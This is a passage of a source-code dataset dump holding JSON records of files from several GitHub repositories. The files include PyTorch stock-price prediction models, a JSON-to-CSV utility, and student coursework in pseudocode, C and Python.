"NEUBIAS/bise-core-ontology", "src_encoding": "UTF-8", "text": "#!/bin/bash\n\nsource activate bise-ld-webapp ; \npython app.py\n" }, { "alpha_fraction": 0.6803653240203857, "alphanum_fraction": 0.689497709274292, "avg_line_length": 17.25, "blob_id": "5f8bb3f77a5cd0f8302097816e0b11c8902ed6d9", "content_id": "84f6e7d48f5dc50db01f6ab43b164749b00bc8ab", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 219, "license_type": "no_license", "max_line_length": 45, "num_lines": 12, "path": "/data-dumps/deprecated/json2csv.py", "repo_name": "NEUBIAS/bise-core-ontology", "src_encoding": "UTF-8", "text": "import csv, json, sys\n\ninput = open(sys.argv[1])\ndata = json.load(input)\ninput.close()\n\noutput = csv.writer(sys.stdout)\n\noutput.writerow(data[0].keys()) # header row\n\nfor row in data:\n output.writerow(row.values())\n" } ]
12
engdorm/stock-price-prediction
https://github.com/engdorm/stock-price-prediction
9d82e31cfde51071594f60d027b90b04d28c6867
5fbdd9c6b81fcbaa0011cff381e17bb489e5afa1
87dbb5e6f922b71949fce5b1f0da83071dad1e11
refs/heads/master
2023-02-05T20:10:40.563504
2020-12-29T01:54:46
2020-12-29T01:54:46
null
0
0
null
null
null
null
null
[ { "alpha_fraction": 0.5650817155838013, "alphanum_fraction": 0.5906389355659485, "avg_line_length": 34.23560333251953, "blob_id": "3055c86c9d229e5b2c90da0176ed1f0b923cae0e", "content_id": "ba6eed7ea828d15a67620aefea1e17724acc61ea", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 6730, "license_type": "no_license", "max_line_length": 97, "num_lines": 191, "path": "/code/cnn.py", "repo_name": "engdorm/stock-price-prediction", "src_encoding": "UTF-8", "text": "import warnings\nwarnings.filterwarnings('ignore')\n\nimport os\nimport time\nimport math\nimport matplotlib.pyplot as plt\nimport pandas as pd\nimport numpy as np\nfrom PIL import Image\nfrom sklearn.metrics import mean_squared_error\n\nimport torch\nfrom torch import nn\nimport torch.nn.functional as F\nfrom torchvision import transforms\nfrom torch.utils.data import DataLoader\nimport pytorch_lightning as pl\n\nroot_dir = '/root/hoai_workspace/stock-price-prediction/'\n\n# STOCK CHART DATASET\nclass StockChartDataset(object):\n def __init__(self, dir_path, transforms):\n self.dir_path = dir_path\n self.transforms = transforms\n df = pd.read_csv(dir_path + 'target.csv')\n self.imgs = df.filename.tolist()\n self.log_target = df.target.tolist()\n\n def __getitem__(self, idx):\n # Load images\n img_path = os.path.join(self.dir_path, self.imgs[idx])\n img = Image.open(img_path).convert('RGB')\n \n target = torch.tensor([self.log_target[idx]])\n\n if self.transforms is not None:\n img = self.transforms(img)\n\n return img, target\n\n def __len__(self):\n return len(self.imgs)\n\n\n# STOCK CHART DATA MODULE\nclass StockChartDataModule(pl.LightningDataModule):\n def setup(self, stage):\n # transforms for images\n transform=transforms.Compose([transforms.ToTensor(), \n transforms.Normalize((0.5, 0.5, 0.5), (0.5, 0.5, 0.5))])\n\n self.train = StockChartDataset(root_dir + 'data/charts/train/',\n transforms=transform)\n self.val = StockChartDataset(root_dir + 'data/charts/val/',\n transforms=transform)\n self.test = StockChartDataset(root_dir + 'data/charts/test/',\n transforms=transform)\n \n def train_dataloader(self):\n return DataLoader(self.train, batch_size=64)\n\n def val_dataloader(self):\n return DataLoader(self.val, batch_size=64)\n \n def test_dataloader(self):\n return DataLoader(self.test, batch_size=64)\n\n\n# RESIDUAL BLOCK\nclass ResidualBlock(nn.Module):\n def __init__(self, num_channels, output_channels, stride1, stride2, stride3, **kwargs):\n super(ResidualBlock, self).__init__(**kwargs)\n self.cond = any([stride1 != 1, stride2 != 1, stride3 != 1])\n self.conv1 = nn.Conv2d(num_channels, num_channels, padding=1, \n kernel_size=3, stride=stride1)\n self.batch_norm = nn.BatchNorm2d(num_channels)\n self.conv2 = nn.Conv2d(num_channels, num_channels, padding=1, \n kernel_size=3, stride=stride2)\n if self.cond:\n self.conv = nn.Conv2d(num_channels, num_channels, padding=0,\n kernel_size=1, stride=max(stride1, stride2, stride3))\n # Last convolutional layer to reduce output block shape.\n self.conv3 = nn.Conv2d(num_channels, output_channels, padding=0, \n kernel_size=1, stride=stride3)\n self.relu = nn.ReLU(inplace=True)\n \n def forward(self, X):\n if self.cond:\n Y = self.conv(X)\n else:\n Y = X\n X = self.conv1(X)\n X = self.batch_norm(X)\n X = self.relu(X)\n X = self.conv2(X)\n X = self.batch_norm(X)\n X = self.relu(X+Y)\n X = self.conv3(X)\n return X\n\n\n# STOCK CHART CNN MODEL\nclass StockChartCNN(pl.LightningModule):\n def __init__(self, output_shape=1):\n super(StockChartCNN, self).__init__()\n self.conv = nn.Conv2d(in_channels=3, out_channels=32, kernel_size=7, stride=2, padding=3)\n self.batch_norm = nn.BatchNorm2d(32)\n self.max_pool = nn.MaxPool2d(kernel_size=3, stride=2, padding=1)\n self.relu = nn.ReLU()\n self.res_conv1 = ResidualBlock(\n num_channels=32, output_channels=128,\n stride1=1, stride2=1, stride3=1)\n self.res_conv2 = ResidualBlock(\n num_channels=128, output_channels=256,\n stride1=2, stride2=1, stride3=1)\n self.res_conv3 = ResidualBlock(\n num_channels=256, output_channels=512,\n stride1=2, stride2=1, stride3=1)\n self.average_pool = nn.AvgPool2d(kernel_size=7, padding=0)\n # self.layer_norm = nn.LayerNorm([512, 1, 1])\n self.fc1 = nn.Linear(in_features=512, out_features=500)\n self.dropout = nn.Dropout(0.5)\n self.fc2 = nn.Linear(in_features=500, out_features=100)\n self.fc3 = nn.Linear(in_features=100, out_features=25)\n self.out = nn.Linear(in_features=25, out_features=output_shape)\n \n def forward(self, X):\n X = self.conv(X)\n X = self.batch_norm(X)\n X = self.relu(X)\n X = self.max_pool(X)\n X = self.res_conv1(X)\n X = self.res_conv2(X)\n X = self.res_conv3(X)\n X = self.average_pool(X)\n # X = self.layer_norm(X)\n X = X.view(X.size(0), -1)\n X = self.fc1(X)\n X = self.dropout(X)\n X = self.fc2(X)\n X = self.dropout(X)\n X = self.fc3(X)\n X = self.dropout(X)\n X = self.out(X)\n return X\n \n def training_step(self, batch, batch_idx):\n # training_step defined the train loop.\n # It is independent of forward\n x, y = batch\n logits = self.forward(x)\n loss = F.mse_loss(logits, y)\n # Logging to TensorBoard by default\n self.log('train_loss', loss)\n return loss\n \n def validation_step(self, batch, batch_idx):\n x, y = batch\n logits = self.forward(x)\n loss = F.mse_loss(logits, y)\n # Logging to TensorBoard by default\n self.log('val_loss', loss)\n return loss\n \n def configure_optimizers(self):\n optimizer = torch.optim.SGD(self.parameters(), lr=0.01, momentum=0.9)\n return optimizer\n # scheduler = torch.optim.lr_scheduler.ReduceLROnPlateau(\n # optimizer, patience=2, verbose=True, min_lr=1e-5\n # )\n # return {'optimizer': optimizer, 'lr_scheduler': scheduler, 'monitor': 'val_loss'}\n\n\n# TRAINER\n# saves a file like: my/path/sample-mnist-epoch=02-val_loss=0.32.ckpt\ncheckpoint_callback = pl.callbacks.ModelCheckpoint(\n monitor='val_loss',\n dirpath=root_dir + 'model/cnn_1227_0',\n filename='dji-non-norm-{epoch:02d}-{val_loss:.9f}',\n save_top_k=5,\n mode='min',\n)\ndata_module = StockChartDataModule()\nmodel = StockChartCNN()\ntrainer = pl.Trainer(gpus=1, max_epochs=100,\n callbacks=[checkpoint_callback],\n default_root_dir=root_dir,\n progress_bar_refresh_rate=2)\ntrainer.fit(model, data_module)\n" }, { "alpha_fraction": 0.5333768129348755, "alphanum_fraction": 0.56013423204422, "avg_line_length": 36.76760482788086, "blob_id": "0422486e827b1f52c0d7ee46d572df2bac17d79d", "content_id": "ff8ad6c7ce78ef3faec053abcad66d9bbe4d2bfd", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 10726, "license_type": "no_license", "max_line_length": 125, "num_lines": 284, "path": "/code/fusion.py", "repo_name": "engdorm/stock-price-prediction", "src_encoding": "UTF-8", "text": "import warnings\nwarnings.filterwarnings('ignore')\n\nimport os\nimport time\nimport math\nimport pandas as pd\nimport numpy as np\nfrom PIL import Image\n\nimport torch\nfrom torch import nn\nimport torch.nn.functional as F\nfrom torchvision import transforms\nfrom torch.utils.data import DataLoader, random_split\nimport pytorch_lightning as pl\n\nroot_dir = '/root/hoai_workspace/stock-price-prediction/'\n\n\n# FUSION DATASETS\nclass FusionDataset(object):\n def __init__(self, df, history_len, step_len, dir_path, transforms):\n self.dir_path = dir_path\n self.transforms = transforms\n df_imgs_path = pd.read_csv(dir_path + 'target.csv')\n self.imgs = df_imgs_path.filename.tolist()\n # self.log_target = df.target.tolist()\n \n self.history_len = history_len\n self.step_len = step_len\n\n df['close_log'] = np.log(df['Close'] / df['Close'].shift(1))\n # df['vol_log'] = np.log(df['Volume'] / df['Volume'].shift(1))\n df['target_log'] = np.log(df['Close'].shift(-step_len) / df['Close'])\n history = []\n target = []\n for i in range(history_len, df.shape[0]-step_len):\n history.append(df[i-history_len+1: i]['close_log'].values)\n target.append(df.loc[i-1, 'target_log'])\n history, target = np.array(history), np.array(target)\n history = np.reshape(history, (history.shape[0], history.shape[1], 1))\n self.history = history\n self.target = target\n\n def __getitem__(self, idx):\n history = torch.tensor(self.history[idx], dtype=torch.float)\n # Load images\n img_path = os.path.join(self.dir_path, self.imgs[idx])\n img = Image.open(img_path).convert('RGB')\n \n target = torch.tensor([self.target[idx]], dtype=torch.float)\n\n if self.transforms is not None:\n img = self.transforms(img)\n\n return history, img, target\n\n def __len__(self):\n return self.history.shape[0]\n\n\n# FUSION DATA MODULE\nclass FusionDataModule(pl.LightningDataModule):\n def __init__(self, df, history_len, step_len):\n super(FusionDataModule, self).__init__()\n self.df = df\n self.history_len = history_len\n self.step_len = step_len\n \n def setup(self, stage):\n # Train/val/test split\n length = self.df.shape[0]\n train_df = self.df[:int(length*0.6)].copy()\n train_df.reset_index(inplace=True)\n val_df = self.df[int(length*0.6):int(length*0.8)].copy()\n val_df.reset_index(inplace=True)\n test_df = self.df[int(length*0.8):].copy()\n test_df.reset_index(inplace=True)\n # transforms for images\n transform=transforms.Compose([transforms.ToTensor(), \n transforms.Normalize((0.5, 0.5, 0.5), (0.5, 0.5, 0.5))])\n\n self.train = FusionDataset(train_df, self.history_len, self.step_len,\n root_dir + 'data/charts/train/',\n transforms=transform)\n self.val = FusionDataset(val_df, self.history_len, self.step_len,\n root_dir + 'data/charts/val/',\n transforms=transform)\n self.test = FusionDataset(test_df, self.history_len, self.step_len,\n root_dir + 'data/charts/test/',\n transforms=transform)\n \n def train_dataloader(self):\n return DataLoader(self.train, batch_size=64)\n\n def val_dataloader(self):\n return DataLoader(self.val, batch_size=64)\n \n def test_dataloader(self):\n return DataLoader(self.test, batch_size=64)\n\n\n# RESIDUAL BLOCK\nclass ResidualBlock(nn.Module):\n def __init__(self, num_channels, output_channels, stride1, stride2, stride3, **kwargs):\n super(ResidualBlock, self).__init__(**kwargs)\n self.cond = any([stride1 != 1, stride2 != 1, stride3 != 1])\n self.conv1 = nn.Conv2d(num_channels, num_channels, padding=1, \n kernel_size=3, stride=stride1)\n self.batch_norm = nn.BatchNorm2d(num_channels)\n self.conv2 = nn.Conv2d(num_channels, num_channels, padding=1, \n kernel_size=3, stride=stride2)\n if self.cond:\n self.conv = nn.Conv2d(num_channels, num_channels, padding=0,\n kernel_size=1, stride=max(stride1, stride2, stride3))\n # Last convolutional layer to reduce output block shape.\n self.conv3 = nn.Conv2d(num_channels, output_channels, padding=0, \n kernel_size=1, stride=stride3)\n self.relu = nn.ReLU(inplace=True)\n \n def forward(self, X):\n if self.cond:\n Y = self.conv(X)\n else:\n Y = X\n X = self.conv1(X)\n X = self.batch_norm(X)\n X = self.relu(X)\n X = self.conv2(X)\n X = self.batch_norm(X)\n # print(f'cnn x: {X.shape}')\n # print(f'cnn y: {Y.shape}')\n X = self.relu(X+Y)\n X = self.conv3(X)\n return X\n\n\nclass FusionLSTM_CNN_3loss(pl.LightningModule):\n def __init__(self):\n super(FusionLSTM_CNN_3loss, self).__init__()\n p = dict(\n history_len = 30,\n step_len = 5,\n seq_len = 29,\n batch_size = 128, \n criterion = nn.MSELoss(),\n max_epochs = 15,\n n_features = 1,\n hidden_size = 50,\n num_layers = 1,\n dropout = 0.8,\n learning_rate = 0.01\n )\n self.n_features = p['n_features']\n self.hidden_size = p['hidden_size']\n self.seq_len = p['seq_len']\n self.batch_size = p['batch_size']\n self.num_layers = p['num_layers']\n self.dropout = p['dropout']\n self.criterion = p['criterion']\n self.learning_rate = p['learning_rate']\n # LSTM feature\n self.lstm_feature = nn.LSTM(input_size=p['n_features'],\n hidden_size=p['hidden_size'],\n num_layers=p['num_layers'],\n dropout=p['dropout'],\n batch_first=True)\n # CNN feature\n self.cnn_feature = nn.Sequential(\n nn.Conv2d(in_channels=3, out_channels=32, kernel_size=7, stride=2, padding=3),\n nn.BatchNorm2d(32),\n nn.MaxPool2d(kernel_size=3, stride=2, padding=1),\n nn.ReLU(),\n ResidualBlock(\n num_channels=32, output_channels=128,\n stride1=1, stride2=1, stride3=1),\n ResidualBlock(\n num_channels=128, output_channels=256,\n stride1=2, stride2=1, stride3=1),\n ResidualBlock(\n num_channels=256, output_channels=512,\n stride1=2, stride2=1, stride3=1),\n nn.AvgPool2d(kernel_size=7, padding=0),\n nn.LayerNorm([512, 1, 1])\n )\n # LSTM FC\n self.lstm_fc = nn.Linear(in_features=p['hidden_size'], out_features=1)\n # CNN FC\n self.cnn_fc1 = nn.Linear(in_features=512, out_features=500)\n self.cnn_fc2 = nn.Linear(in_features=500, out_features=100)\n self.cnn_fc3 = nn.Linear(in_features=100, out_features=25)\n self.cnn_out = nn.Linear(in_features=25, out_features=1)\n # LSTM-CNN FC\n self.dropout = nn.Dropout(0.5)\n self.fc1 = nn.Linear(in_features=562, out_features=500)\n self.fc2 = nn.Linear(in_features=500, out_features=100)\n self.fc3 = nn.Linear(in_features=100, out_features=25)\n self.out = nn.Linear(in_features=25, out_features=1)\n \n def forward(self, x1, x2):\n # LSTM model\n x1, _ = self.lstm_feature(x1)\n x1 = x1[:,-1]\n lstm_out = self.lstm_fc(x1)\n # CNN model\n x2 = self.cnn_feature(x2)\n x2 = x2.view(x2.size(0), -1)\n cnn_out = self.cnn_fc1(x2)\n cnn_out = self.dropout(cnn_out)\n cnn_out = self.cnn_fc2(cnn_out)\n cnn_out = self.dropout(cnn_out)\n cnn_out = self.cnn_fc3(cnn_out)\n cnn_out = self.dropout(cnn_out)\n cnn_out = self.cnn_out(cnn_out)\n # Fusion model\n fusion_out = torch.cat((x1, x2), 1)\n fusion_out = self.fc1(fusion_out)\n fusion_out = self.dropout(fusion_out)\n fusion_out = self.fc2(fusion_out)\n fusion_out = self.dropout(fusion_out)\n fusion_out = self.fc3(fusion_out)\n fusion_out = self.dropout(fusion_out)\n fusion_out = self.out(fusion_out)\n \n return lstm_out, cnn_out, fusion_out\n \n def training_step(self, batch, batch_idx):\n # training_step defined the train loop.\n # It is independent of forward\n x1, x2, target = batch\n logits_lstm, logits_cnn, logits_fusion = self.forward(x1, x2)\n loss = 0.2*F.mse_loss(logits_lstm, target) + 0.2*F.mse_loss(logits_cnn, target) + F.mse_loss(logits_fusion, target)\n # Logging to TensorBoard by default\n self.log('train_loss', loss)\n return loss\n \n def validation_step(self, batch, batch_idx):\n x1, x2, target = batch\n logits_lstm, logits_cnn, logits_fusion = self.forward(x1, x2)\n # loss = 0.2*F.mse_loss(logits_lstm, target) + 0.2*F.mse_loss(logits_cnn, target) + F.mse_loss(logits_fusion, target)\n loss = F.mse_loss(logits_fusion, target)\n # Logging to TensorBoard by default\n self.log('val_loss', loss)\n return loss\n \n def configure_optimizers(self):\n optimizer = torch.optim.SGD(self.parameters(), lr=0.01, momentum=0.9)\n scheduler = torch.optim.lr_scheduler.ReduceLROnPlateau(\n optimizer, patience=2, verbose=True, min_lr=1e-5\n )\n return {'optimizer': optimizer, 'lr_scheduler': scheduler, 'monitor': 'val_loss'}\n\n\n# TRAINER\np = dict(\n history_len = 30,\n step_len = 5,\n seq_len = 29,\n batch_size = 128, \n criterion = nn.MSELoss(),\n max_epochs = 15,\n n_features = 1,\n hidden_size = 50,\n num_layers = 1,\n dropout = 0.8,\n learning_rate = 0.01\n )\ndf = pd.read_csv(root_dir + 'data/dji_2009-2019.csv')\ndata_module = FusionDataModule(df, p['history_len'], p['step_len'])\ncheckpoint_callback = pl.callbacks.ModelCheckpoint(\n monitor='val_loss',\n dirpath=root_dir + 'model/fusion-1227_4',\n filename='dji-scheduler-{epoch:02d}-{val_loss:.9f}',\n save_top_k=5,\n mode='min',\n)\ntrainer = pl.Trainer(\n max_epochs=150,\n gpus=1,\n callbacks=[checkpoint_callback]\n)\nmodel = FusionLSTM_CNN_3loss()\ntrainer.fit(model, data_module)\n" }, { "alpha_fraction": 0.7275192141532898, "alphanum_fraction": 0.7654767036437988, "avg_line_length": 40, "blob_id": "095c6094828ef1d111c2af18aa3cc0473a27c520", "content_id": "16db9e6da02e8dbba3c10619eb92be452505acb6", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Markdown", "length_bytes": 2213, "license_type": "no_license", "max_line_length": 88, "num_lines": 54, "path": "/README.md", "repo_name": "engdorm/stock-price-prediction", "src_encoding": "UTF-8", "text": "Introduction\n============\n\nForecasting stock prices plays an important role in setting a trading\nstrategy or determining the appropriate timing for buying or selling a\nstock. In this project, we use a model, called feature fusion long\nshort-term memory-convolutional neural network (LSTM-CNN) model. It\ncombines features learned from different representations of the same\ndata, namely, stock time series and stock chart images, to predict stock\nprices.\n\nRelated Work\n============\n\nStock prediction is one of the most challenging and long standing\nproblems in the field of time series data. H.Q.Thang @hust used Gaussian\nProcess Regression and Autoregressive Moving Average Model to predict\nVietnam Stock Index Trend. N.V.Son @vbd used ARIMA and LSTM to predict\nsome stock symbols like APPL (Apple), AMZN (Amazon).\n\nIn this project, we use a combined model called long short-term\nmemory-convolutional neural network (LSTM-CNN) to predict closed price\nof Dow Jones Industrial Average (DJIA). As an extension, the model will\nbe implemented on VN-30 index data. Kim T, Kim HY @ours implemented\nfusion LSTM-CNN model on 2018-2019 S&P 500 data. Simiarly, Hao Y, Gao Q\nconstructed LSTM-CNN model using 2009-2019 S&P 500 data.\n\nExpected Results\n================\n\n- Understand CNN, LSTM model and its application to time series\n forecasting problems.\n\n- Understand forecasting stock prices problem, the application of\n machine learning in this field and the shortcomings of using them in\n the real market.\n\nReference\n=========\n\n<span>1.</span> H.Q.Thang. *Vietnam Stock Index Trend Prediction using\nGaussian Process Regression and Autoregressive Moving Average Model*.\nResearch and Development on Information and Communication Technology,\nHUST, 2018.\n\n<span>2.</span> Kim T, Kim HY. *Forecasting stock prices with a feature fusion LSTM-CNN\nmodel using different representations of the same data*. PLoS ONE 14(2):\ne0212320, 2019.\n<https://doi.org/10.1371/journal.pone.0212320>\n\n<span>3.</span> Hao Y, Gao Q. *Predicting the Trend of Stock Market Index Using the\nHybrid Neural Network Based on Multiple Time Scale Machine Learning*.\nMDPI Appl. Sci. 2020, 10(11), 3961.\n<https://doi.org/10.3390/app10113961>" } ]
3
Jessonsotoventura/Berea-College
https://github.com/Jessonsotoventura/Berea-College
e5a2d340996f67d611a8e9f0eb3beeb68dc0266b
f1443b8e8e8fffcdae4248b7ebeda0e8da3e451e
1724be3d4f591eb31d3664b42260c4ca86997c00
refs/heads/master
2019-04-02T07:23:20.143102
2018-03-01T05:08:57
2018-03-01T05:51:00
68,252,306
0
0
null
null
null
null
null
[ { "alpha_fraction": 0.6321269273757935, "alphanum_fraction": 0.6479920744895935, "avg_line_length": 22.183908462524414, "blob_id": "59f5f0a59c8944d62792c306d3014aa60dc4a0c2", "content_id": "10220412b40f105818b24fcb32b2326cef79d9d1", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Markdown", "length_bytes": 2017, "license_type": "no_license", "max_line_length": 257, "num_lines": 87, "path": "/MAT 433 - Numberical Analysis/HW_1.md", "repo_name": "Jessonsotoventura/Berea-College", "src_encoding": "UTF-8", "text": "# Algorithm\nAn algorithm is a set of steps that can be replicated to have an action occur. For example, an algorithm to add two numbers might take the one's place add them then add the tens and add any carries that might occur.\n\n# Flowchart\nA visual representation of an algorithm with set symbols denoting input, procedures, conditionals, and start and ends to the algorithms. Typically a oval is the start and end, conditionals are diamonds, input is a parallelogram and procedure is a rectangle.\n\n# Psuedocode\nA human friendly representation of a step of steps (algorithm) that can be followed to write actual code. Psuedocode is should be readable by humans almost as easily as prose.\n\n# 2 Addition\n\n```js \nFunction add (x, y):\ninput [x_n, y_n]\nx_length = len(x)\ny_length = len(y)\nloop_length = 0\n\nif x_length < y_length:\n loop_length = y_length\n diffrence = y_length - x_length\n for diffrence; diffrence -= 1:\n x = append(0, x)\nelse:\n loop_length = x_length\n diffrence = x_length - y_length\n for diffrence; diffrence -= 1:\n x = append(0, x)\n\ncounter = loop_length\nresult = list(loop_length)\nfor loop_length; loop_length -=1 and loop_length > 1:\n ones = x_counter + y_counter\n if ones >= 10:\n x_(counter-1) += 1\n result_counter = ones\n counter -= 1\n\nleading_digits = x_0 + y_0\nresult_0 = leading_digits\noutput result\n```\n\n\n# 3 Multiplication\n\n```js\nFunction multiply(x,y):\ninput(x_n, y_n)\nresult = 0\nif x_n < y_n:\n for x_n; x_n -=1:\n result += add(result, y_n)\nelse:\n for y_n; y_n -=1:\n result += add(result, x_n)\noutput result\n```\n\n#4 Primeize\n```\nFunction prime(x):\ninput(x)\nif x == 1 or x == 2:\n print(x)\n end\ncounter = x-1\nresult = \"\"\nwhile counter > 0:\n if x%2 == 0:\n result += x\n x = x/2\n else:\n while x % counter != 0:\n counter -= 1\n if counter == 1:\n counter = -1 \n break\n else:\n if x/counter < counter:\n x = counter\n result += x/counter\n else:\n x = x/counter\n result += counter\nprint result\n```\n" }, { "alpha_fraction": 0.5928692817687988, "alphanum_fraction": 0.6010186672210693, "avg_line_length": 22.94308853149414, "blob_id": "386673b4b89e856401afa8b9b982521d22c654c6", "content_id": "c9d92462fa73a2bdb149106b089e5fb504118fe1", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "C", "length_bytes": 2945, "license_type": "no_license", "max_line_length": 122, "num_lines": 123, "path": "/CSC 386 - Embedded Systems/structs-two/linear-regression.c", "repo_name": "Jessonsotoventura/Berea-College", "src_encoding": "UTF-8", "text": "#include <stdio.h>\n#include <math.h>\n#include <stdlib.h>\n\n#define NUM_POINTS 15\n\n\ntypedef struct Point {\n int x;\n int y;\n} Point;\n\nvoid show_points (Point *points) {\n int ndx;\n for (ndx = 0 ; ndx < NUM_POINTS ; ndx++) {\n printf (\"[%d] x: %d, y: %d\\n\", ndx, points[ndx].x, points[ndx].y);\n }\n}\n\nvoid read_points (Point *points, char* fname) {\n FILE *pointsFile;\n \n int ndx;\n \n pointsFile = fopen(fname, \"r\");\n \n // We only read NUM_POINTS points from the file.\n for (ndx = 0 ; ndx < NUM_POINTS; ndx++) {\n Point *p = (Point *)malloc(sizeof(Point));\n int x, y;\n \n fscanf(pointsFile, \"%d,%d\", &x, &y);\n p->x = x;\n p->y = y;\n points[ndx] = *p;\n \n }\n \n fclose(pointsFile);\n \n}\n\nfloat calculate_beta (Point *points) {\n\n int Sxy = 0;\n int Sy = 0;\n int Sx = 0;\n float Sxx = 0;\n\n // Loop over the list and add the values to the correct variables.\n for(int counter = 0; counter < NUM_POINTS; counter++){\n printf(\"%d\", points);\n Sxy += points[counter].x * points[counter].y;\n Sy += points[counter].y;\n Sx += points[counter].x;\n Sxx += points[counter].x * points[counter].x;\n } \n // Solve for beta\n float beta = (NUM_POINTS*Sxy - Sx*Sy)/(NUM_POINTS*Sxx-pow(Sx,2));\n return beta;\n}\n\nfloat calculate_alpha (Point *points) {\n \n float beta = calculate_beta(points);\n int Sy = 0;\n int Sx = 0;\n\n // Loop over the list and add the values to the correct variables.\n for(int counter = 0; counter < NUM_POINTS; counter++){\n Sy += points[counter].y;\n Sx += points[counter].x;\n }\n // Solve for alpha\n float alpha = (Sy/NUM_POINTS) - (Sx*beta)/(NUM_POINTS);\n return alpha;\n}\n\n\nfloat calculate_R (Point *points) {\n int Sxy = 0;\n int Sy = 0;\n int Sx = 0;\n float Sxx = 0;\n int Syy = 0;\n\n // Loop over the list and add the values to the correct variables.\n for(int counter = 0; counter < NUM_POINTS; counter++){\n Sxy += points[counter].x * points[counter].y;\n Sy += points[counter].y;\n Sx += points[counter].x;\n Sxx += points[counter].x * points[counter].x;\n Syy += points[counter].x * points[counter].y;\n }\n // Solve for r\n float r = ( (NUM_POINTS * Sxy) - (Sx*Sy) )/ (sqrt ( (NUM_POINTS*Sxx - pow(Sx,2) ) * ( NUM_POINTS*Syy - pow(Sy, 2)) ));\n return r;\n\n}\n\nint main (int argc, char* argv[]) {\n Point *points = (Point *)malloc(sizeof(Point) * NUM_POINTS);\n \n\t// Make sure we have one argument---the name of the datafile---\n\t// on the command line.\n if (argc > 1) { \n // Read into the points array.\n read_points (points, argv[1]);\n // Print them, to make sure you have an array of populated\n\t\t// Point structures. If this code works, it means you can implement\n\t\t// your algorithm.\n show_points(points);\n\t\n\t\t// These functions need to be completed by you.\n\t\tfloat alpha = calculate_alpha(points);\n\t\tfloat beta = calculate_beta(points);\n\t\tfloat R = calculate_R(points);\n\t\t\n\t\t// Print useful information to the user here.\n }\n\t\n\treturn 0;\n}\n" }, { "alpha_fraction": 0.4543132185935974, "alphanum_fraction": 0.4633523225784302, "avg_line_length": 40.040321350097656, "blob_id": "9ddd6f2784be51d68db7971f58ab6aace8f1dca5", "content_id": "647013dd34e5bef32a74709147688fb788b1059a", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 5089, "license_type": "no_license", "max_line_length": 106, "num_lines": 124, "path": "/CSC 236 - Software Design/PetSimulator/simulator.py", "repo_name": "Jessonsotoventura/Berea-College", "src_encoding": "UTF-8", "text": "from pet import Pet\nfrom food import Food\nfrom owner import Owner\nimport random\n\nclass Simulator:\n \"\"\" Simulates owners and thier pets \"\"\"\n name_list = [\"John\", \"Jack\", \"Seth\", \"Pablo\",\n \"RicK\", \"Morty\", \"Sher\",\"Pure Evil\",\n \"Migel\", \"Reberto\",\"Alondra\", \"Titan\"]\n def __init__(self):\n \"\"\" Creats and instance of the class \"\"\"\n self.owners = list()\n self.add_owners()\n\n def start_simulation(self, years):\n \"\"\" Starts up the simulator \"\"\"\n for day in range(years * 365):\n # See what the owner did on that day\n for owner in self.owners:\n print(\"Day: \" + str(day) + \" for \"+ owner.get_name() +\": \")\n \n # Pick a random action for the user\n action = random.randint(0, 9)\n name = self.name_list[day % len(self.name_list)]\n pet_count = len( owner.get_pets() )\n\n # Determine what that action does\n if action == 0:\n # Add a pet\n pet = Pet(name)\n owner.add_pet(pet)\n print (owner.get_name() + \" just added a new pet \" + name)\n elif action == 1 and pet_count > 0:\n # Feed a pet\n food_name = [\"Apple Pie\", \"Cake\", \"Watermelon\", \"Takeout\", \"Ceral\", \"Cheese\", \"Water\"]\n meal = Food(food_name)\n pet = owner.get_random_pet()\n owner.feed(pet, meal)\n elif action == 2 and pet_count > 0:\n\n # play with a pet\n pet = owner.get_random_pet()\n owner.play(pet)\n elif action == 3 and pet_count > 0:\n\n # release a pet\n pet = owner.get_random_pet()\n owner.remove_pet(pet)\n print (owner.get_name() + \" has choosen to release \" + pet.get_name())\n elif action == 4 and pet_count > 0:\n \n # set a pet's name\n pet = owner.get_random_pet()\n old_name = pet.get_name()\n owner.set_name(name)\n print (owner.get_name() + \" has changed \" + old_name + \"'s name to \" + pet.get_name())\n elif action == 5 and pet_count > 0:\n\n # feed a pet\n pet = owner.get_random_pet()\n hunger_change = random.randint(-70, 20)\n pet.adjust_hunger(hunger_change)\n self.check_hunger(owner, pet)\n elif action == 6 and pet_count > 0:\n\n # improve a pet's happiness\n pet = owner.get_random_pet()\n happiness_change = random.randint(-70, 2)\n pet.adjust_happines(happiness_change)\n self.check_happiness(owner, pet)\n elif action == 7 and pet_count > 0:\n\n # set a pet's happiness\n pet = owner.get_random_pet()\n happiness = random.randint(0, 100)\n pet.set_happiness(happiness)\n self.check_happiness(owner, pet)\n elif action == 8 and pet_count > 0:\n\n # Set a pet's hunger\n pet = owner.get_random_pet()\n hunger = random.randint(0, 100)\n pet.set_hunger(hunger)\n self.check_hunger(owner, pet)\n else: \n # The owner did nothing\n print (\"Left his pets alone\")\n \n\n def check_hunger(self, owner, pet):\n \"\"\" Make sure the pet is not starving \"\"\"\n hunger = pet.get_hunger()\n if hunger < 0:\n owner.remove_pet(pet)\n print (pet.get_name() + \" has left \" + owner.get_name() + \" due to hunger\")\n elif hunger < 70:\n print (owner.get_name() + \"'s pet \"+ pet.get_name() + \" is not hungry.\")\n else:\n print (owner.get_name() + \"'s pet \" +pet.get_name() + \" is stuffed \")\n\n def check_happiness(self, owner, pet):\n \"\"\" Make sure the pet is not starving \"\"\"\n hunger = pet.get_happiness()\n if hunger < 0:\n owner.remove_pet(pet)\n print (pet.get_name() + \" has left \" + owner.get_name() + \" due to saddness\")\n elif hunger < 70:\n print (owner.get_name() + \"'s pet \" + pet.get_name() + \" is happy. \")\n else:\n print (owner.get_name() + \"'s pet \" + pet.get_name() + \" is excited. \")\n\n def get_simulation_stats(self):\n \"\"\" Gets the simulator results \"\"\"\n return stats\n\n def add_owners(self):\n \"\"\" Adds owners to the simulation \"\"\"\n owner_count = random.randint(5,14)\n for i in range(owner_count):\n name = self.name_list[i % len(self.name_list)]\n owner = Owner(name)\n print(\"Added \" + name + \" as an owner\")\n self.owners.append(owner)\n" }, { "alpha_fraction": 0.6056337952613831, "alphanum_fraction": 0.6056337952613831, "avg_line_length": 